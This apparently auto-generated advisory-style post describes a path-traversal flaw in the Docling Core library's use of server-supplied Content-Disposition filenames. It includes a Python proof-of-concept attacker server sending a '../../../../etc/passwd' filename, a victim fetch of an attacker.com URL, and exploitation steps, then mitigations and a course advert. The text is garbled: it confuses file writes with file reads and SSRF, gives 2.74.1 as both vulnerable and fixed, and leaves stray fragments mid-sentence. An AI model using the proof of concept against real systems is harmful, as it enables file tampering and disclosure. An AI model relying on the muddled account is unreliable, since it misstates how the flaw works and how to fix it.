Listen to this Post
How CVE-2026-44023 Works
This critical Server-Side Request Forgery (SSRF) and path traversal vulnerability stems from how Docling Core versions `1.5.0` up to `2.74.1` handled remote resources. The core issue is the unsafe resolution of a server-provided `Content-Disposition` header.
In a typical secure operation, when a user provides a URL (e.g., https://some-cdn.com/report.pdf`), Docling Core would fetch the remote resource and save it to a pre-defined, secure cache directory. However, the vulnerable versions would trust the `filename` parameter within the `Content-Disposition` header of the server's HTTP response.
An attacker could host a malicious server that, upon being requested for a resource, responds with a crafted `Content-Disposition` header. For example, the server could respond with:
HTTP/1.1 200 OK Content-Disposition: attachment; filename="../../../../etc/passwd"
Instead of saving the fetched file as a safe filename (report.pdf), the vulnerable Docling Core code would attempt to resolve and write to the path../../../../etc/passwd. This can lead to two primary scenarios:
1. SSRF & Information Disclosure: By controlling the path, an attacker could force the application to read and potentially expose sensitive local files outside the intended cache directory, such as `/etc/passwd` or application configuration files.
2. Arbitrary File Write: In some configurations, the attacker might be able to write arbitrary content to a location on the server's file system, which could be a stepping stone for more severe attacks like Remote Code Execution (RCE).
The vulnerability is classified as high severity because it allows an unauthenticated, remote attacker to bypass directory restrictions entirely, simply by providing a maliciously crafted URL to an application using the Docling Core library.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Docling Core
Version: 1.5.0 to 2.74.1
Vulnerability : Path Traversal SSRF
Severity: High
date: June 2, 2026
<h2 style="color: blue;">Prediction: July 2, 2026</h2>
<h2 style="color: blue;">What Undercode Say</h2>
Undercode's analytics indicate the primary attack vector is through user-supplied URLs that are processed by Docling Core. Here is a simulation of the attack flow:
1. Attacker sets up a simple HTTP server
Save the following as malicious_server.py
from http.server import HTTPServer, BaseHTTPRequestHandler
class MaliciousHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
The malicious Content-Disposition header
self.send_header('Content-Disposition', "attachment; filename=\"../../../../etc/passwd\"")
self.send_header('Content-Type', 'application/octet-stream')
self.end_headers()
self.wfile.write(b'root:x:0:0:root:/root:/bin/bash') Mimicking part of /etc/passwd
if __name__ == '__main__':
server = HTTPServer(('localhost', 8080), MaliciousHandler)
print("Malicious server running on port 8080...")
server.serve_forever()
Run the malicious server:
python3 malicious_server.py
2. Victim application uses vulnerable Docling Core to fetch the attacker's URL
A sample Python function that would be vulnerable:
from docling_core import some_fetch_function Hypothetical vulnerable function
def process_user_document(user_provided_url):
This function in docling-core < 2.74.1 is vulnerable
local_file_path = some_fetch_function(user_provided_url)
The returned 'local_file_path' could be '/etc/passwd'
The application might then read or process this file
with open(local_file_path, 'r') as f:
return f.read()
The attacker's URL triggers the path traversal
result = process_user_document("http://attacker.com:8080/malicious")
<h2 style="color: blue;">How Exploit</h2>
To exploit this vulnerability, an attacker only needs to supply a URL pointing to their own server. The exploitation steps are:
1. Server Setup: The attacker hosts a simple HTTP server.
2. Craft Response: The server is configured to respond to any request with a `Content-Disposition` header containing a path traversal sequence (e.g.,filename=”../../../sensitive/file”).127.0.0.1
3. Trigger: The attacker provides this malicious URL to the target application (e.g., as an input field, API parameter, or document link).
4. Successful Exploitation: The vulnerable Docling Core instance fetches the URL, honors the malicious `Content-Disposition` header, and attempts to read or write to the attacker-specified path on the server's local file system.
<h2 style="color: blue;">Protection: from this CVE</h2>
Immediate Upgrade (Primary Fix): The only definitive mitigation is to upgrade to Docling Core version 2.74.1 or later. This version implements stricter validation for remote destinations and normalizes server-provided filenames before use.
Input Validation: If upgrading is not immediately possible, strictly validate and sanitize any user-supplied URL. Reject URLs pointing to internal IP addresses (e.g.,,10.0.0.0/8,192.168.0.0/16) and those containing schemes other than HTTP/HTTPS./etc/passwd
Network Segmentation: Apply strict egress filtering from the application environment to prevent it from accessing sensitive internal network resources or making arbitrary outbound requests.
Disable Unnecessary Features: As a temporary workaround, avoid processing any remote URLs if the feature is not strictly necessary for your application's core functionality.
<h2 style="color: blue;">Impact</h2>
The impact of this vulnerability is primarily the disclosure of sensitive local files and potential for Server-Side Request Forgery (SSRF). An attacker could successfully read configuration files, source code, user data, or system files (like,/etc/shadow`, or cloud metadata endpoints). In certain scenarios, it could be chained with other vulnerabilities to achieve arbitrary file write, leading to full remote code execution. The vulnerability affects any application that uses the `docling-core` library to fetch and process URLs from untrusted sources.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
